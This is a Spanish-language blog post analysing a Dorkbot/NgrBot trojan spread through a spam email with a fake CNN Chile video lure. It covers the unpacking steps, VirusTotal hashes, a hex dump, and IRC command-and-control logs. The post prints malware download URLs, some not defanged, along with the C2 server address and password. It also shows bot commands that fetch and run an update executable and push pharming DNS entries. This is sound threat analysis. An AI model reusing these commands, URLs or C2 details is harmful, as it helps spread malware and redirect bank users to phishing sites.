lunes, 6 de febrero de 2012



Dorkbot / NgrBot (Parte II)




En el día de ayer me reenviaron un mail de un supuesto video de la CNN Chile
con subject: "Sexo masivo en playa nudista" el cual tiene un link a un ejecutable.




Link:
hxxp//www.sistemadegestion.cl/cnnchileactualidad.php

Descarga del troyano.
hxxp://www.cravattificioitaliano.it/includes/languages/cnnchile.exe

(actualizado hxxp://megamovimientos.com/web/cnnchileactualidad.exe)

Imagen hot...
hxxp://kodra-tron.hr/images/video.jpg


Evidentemente se trata de un troyano.... adivinen... Dorkbot...

Enviando la muestra a Virus Total me entrega lo siguiente:




SHA256: aa995b1472ad73b781c40b9c6c4ab83d3bdd781b07256345d77b9e24b2812eee
Nombre: cnnchile.exe
Detecciones: 9 / 42
Fecha de análisis: 2012-02-06 03:08:25 UTC ( hace 0 minutos )



Un pequeño vistazo con un editor Hexadecimal me muestra que esta compactado con UPX .

Lo desempacamos con UPX.

Ultimate Packer for eXecutables

Copyright (C) 1996 - 2011

UPX 3.08w Markus Oberhumer, Laszlo Molnar & John Reiser Dec 12th 2011

        File size Ratio Format Name
   -------------------- ------ ----------- -----------

204800 <- 157696 77.00% win32/pe cnnchile.exe

Unpacked 1 file.



Lo cargo en el Ollydbg y veo que tiene una capa de encripcion realizada con un Crypter en C++


Lo desencripto obteniendo el fichero original.





000586C8 | 61 69 6E 20 72 65 61 73 | ain reas |
000586D0 | 6F 6E 73 3A 0D 0A 2D 20 | ons:..-  |
000586D8 | 79 6F 75 20 73 74 75 70 | you stup |
000586E0 | 69 64 20 63 72 61 63 6B | id crack |
000586E8 | 65 72 0D 0A 2D 20 79 6F | er..- yo |
000586F0 | 75 20 73 74 75 70 69 64 | u stupid | 
000586F8 | 20 63 72 61 63 6B 65 72 |  cracker | 
00058700 | 2E 2E 2E 0D 0A 2D 20 79 | .....- y | 
00058708 | 6F 75 20 73 74 75 70 69 | ou stupi | 
00058710 | 64 20 63 72 61 63 6B 65 | d cracke | 
00058718 | 72 3F 21 0D 0A 00 00 00 | r?!..... | 
00058720 | 6E 67 72 42 6F 74 20 45 | ngrBot E | 
00058728 | 72 72 6F 72 00 00 00 00 | rror.... | 
00058730 | 73 68 65 6C 6C 33 32 2E | shell32. | 
00058738 | 64 6C 6C 00 22 00 25 00 | dll.".%. | 
00058740 | 73 00 22 00 20 00 25 00 | s.". .%. | 
00058748 | 53 00 00 00 6D 73 67 00 | S...msg. | 


Analizando el Trafico de red del bot, el mismo se 
conecta al servidor de IRC 173.224.220.218:1863 con 
usuario  = hzbcoct
password = secret
luego hace un join a los canales #bots y #ar a la espera de comandos.

Log..........................................................
[06/02/2012 1:05:01:680]
PASS secret
NICK n{AR|XPa}hzbcoct
USER hzbcoct 0 0 :hzbcoct

[06/02/2012 1:05:02:181]
:001 get.lost
002 002 002
003 003 003
004 004 004
005 005 005
005 005 005
005 005 005
PING 422 MOTD

[06/02/2012 1:05:02:181]
JOIN #bots priv8s

[06/02/2012 1:05:02:422]
:n{AR|XPa}hzbcoct!hzbcoct@190.172.106.28 JOIN :#bots
:get.lost 332 n{AR|XPa}hzbcoct #bots :!s
:get.lost 333 n{AR|XPa}hzbcoct #bots xarnas 1328495090

[06/02/2012 1:05:02:422]
JOIN #AR 

[06/02/2012 1:05:02:662]
:n{AR|XPa}hzbcoct!hzbcoct@190.172.106.28 JOIN :#AR

Log.......................................................

Quedo a la espera de comandos pero nada... se ve que el botmaster es medio vago.


Al otro día me conecto con un cliente IRC y se pueden ver dos comandos, uno para descargar un ejecutable (update bot) y otro para realizar pharming al Banco davivienda.com


Nuevo ejecutable en http://jjij.in/nr.exe

Lo bajo y analizo en VT



SHA256: 1ecf4c538676040b7b704f2f13484ffbe6b65d860c46f0f7096679215e6beeef
Nombre: nr.exe
Detecciones: 2 / 43
Fecha de análisis: 2012-02-06 22:37:42 UTC ( hace 1 hora, 38 minutos )

Paso a tener menos detecciones que el anterior.

Analizamos....Idem anterior UPX + Crypter..



Desencriptamos con Ollydbg.... y.... es otro Dorkbot...





Actualización 10/02/2012!!! --------------------------


Nuevo binario.

 http://jjij.in/nr.exe


SHA256:5b2f9ddca23818ce79113d1bab8f8ccd4a1cafbd5d7710b01ed7133cbe97fe75
File name:nr.exe
Detection ratio:1 / 43
Analysis date:2012-02-10 23:00:29 UTC ( 19 minutes ago )



Si!!! Otro DorkBot pero con otro tipo de ofuscación, ya no tiene le clásico UPX (este resulto mas fácil destriparlo...jaja)






Nuevo pharming




Comunicación de los Bots con el IRC

PASS secret
NICK n{AR|XPa}cnrsibx
USER cnrsibx 0 0 :cnrsibx

[10/02/2012 20:54:11:472]
:001 get.lost
002 002 002
003 003 003
004 004 004
005 005 005
005 005 005
005 005 005
PING 422 MOTD

[10/02/2012 20:54:11:472]
JOIN #bots priv8s

[10/02/2012 20:54:11:683]
:n{AR|XPa}cnrsibx!cnrsibx@190.172.96.15 JOIN :#bots
:get.lost 332 n{AR|XPa}cnrsibx #bots :!s
:get.lost 333 n{AR|XPa}cnrsibx #bots alive 1328908290

[10/02/2012 20:54:11:683]
JOIN #AR 

[10/02/2012 20:54:11:893]
:n{AR|XPa}cnrsibx!cnrsibx@xxx.xxx.xxx.xxxJOIN :#AR

El topic para #bots es !s !up http://jjij.in/nr.exe 84280c20f5e9b2dad083e42b0a0a3b11 !mdns http://jjij.in/DNS.txt


De lo que se observa:
 el comando !up para updatear el ejecutable
 el comando !mdns modificar dns, cargando los sitios de phishing al archivo .host


Eso es todo por hoy.... Saludos!




@Dkavalanche  2012



No hay comentarios:

 Hola, me mudé a medium .... nos vemos!!! FELIZ 2022!!!